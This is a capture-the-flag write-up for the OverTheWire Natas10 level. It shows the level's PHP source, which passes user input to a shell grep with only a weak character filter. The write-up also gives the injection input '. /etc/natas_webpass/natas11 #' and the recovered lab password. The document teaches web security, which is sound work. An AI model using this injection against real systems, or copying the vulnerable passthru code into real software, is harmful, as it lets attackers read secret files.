Natas10 - natas11

From JaxHax
Jump to: navigation, search

Level Goal

For security reasons, we now filter on certain characters
Find words containing: [____________________________] [Search]
Output:

                               <View sourcecode>


Solution

Decided to click the <View sourcecode> link which goes to http://natas10.natas.labs.overthewire.org/index-source.html. It gave me the following code:

<html>
   <head>
      <!-- This stuff in the header has nothing to do with the level -->
      <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
      <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
      <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
      <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
      <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
      <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script>
      <script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
      <script>var wechallinfo = { "level": "natas10", "pass": "<censored>" };</script>
   </head>
   <body>
      <h1>natas10</h1>
      <div id="content">
         For security reasons, we now filter on certain characters<br/><br/>
         <form>
            Find words containing: <input name=needle>
            <input type=submit name=submit value=Search><br><br>
         </form>
 
 
         Output:
         <pre>
<?
$key = "";
 
if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}
 
if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>
         </pre>
 
         <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
      </div>
   </body>
</html>


So the PHP code is taking the user's search term and passing it to the commandline to do a grep search against dictionary.txt. This time it is doing sanity checks against the user value for & and ; before dumping it in the commandline command for execution...


This is a classic command injection bug! But now with filtering... Which is adorable...


However due to the filtering being poorly done, my solution for natas9 should still work here, just update the file.


If we try:

'. /etc/natas_webpass/natas11 #'


The command should be:

'grep -i . /etc/natas_webpass/natas11 # dictionary.txt'


Let's try it:

For security reasons, we now filter on certain characters
Find words containing: [_. /etc/natas_webpass/natas11 #_] [Search]
Output:
U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

                               <View sourcecode>

And we win son! Again... Without tweaking anything to deal with the filter. Our first solution was elequent enough for two rounds. :-)